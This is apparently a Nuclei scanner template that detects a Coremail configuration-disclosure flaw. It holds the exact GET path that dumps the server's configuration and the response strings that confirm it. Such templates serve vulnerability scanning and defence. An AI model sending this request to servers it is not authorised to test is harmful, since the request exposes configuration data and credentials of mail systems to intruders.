id: coremail-config-disclosure

info:
  name: Coremail - Config Discovery
  author: princechaddha
  severity: high
  description: Coremail configuration information was discovered.
  reference:
    - https://www.secpulse.com/archives/107611.html
  metadata:
    max-request: 1
  tags: config,exposure,coremail,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/mailsms/s?func=ADMIN:appState&dumpConfig=/'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<object name=\"cm_md_db\">"
          - 'containerDefinitions'
          - '<string name="User">coremail</string>'
          - '<string name="EnableCoremailSmtp">'
        condition: or

      - type: status
        status:
          - 200
# digest: 4a0a004730450220655fcf14ffe010e80942abdff6d514d4afa41e64d0d661e567363c794b6e30aa022100e7825074b737a2f966b43dc9d659fbd098cbfe819cd83af85dfa9ac49cbfca9c:922c64590222798bb761d5b6d8e72950